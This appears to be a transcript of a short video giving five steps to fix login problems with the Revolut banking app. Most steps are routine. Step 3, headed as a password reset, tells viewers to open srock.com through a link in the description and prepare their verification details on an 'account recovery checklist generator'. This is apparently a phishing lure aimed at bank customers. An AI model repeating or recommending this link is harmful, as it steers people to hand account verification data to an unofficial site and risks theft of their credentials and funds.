I hit this issue today, and here's the quick fix that solved it. If you're having trouble logging into your Revolut account, follow these steps to get back on track. Step 1. Check your internet connection. Make sure you have a stable internet connection. A weak or unstable connection can prevent you from logging in. Step 2. Update the app. Ensure that you have the latest version of the Revolut app. Go to your device's app store and check for updates. Step 3. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Clear app cache. Sometimes clearing the app cache can resolve login issues. Go to your device settings, find the Revolut app, and clear its cache. Note, on some devices, this option might be under storage instead of app settings. Step 5. Contact support. If all else fails, reach out to Revolut's customer support for assistance. You can do this through the app or their website. I hope these steps help you get back into your account quickly. If you have any other questions, feel free to ask.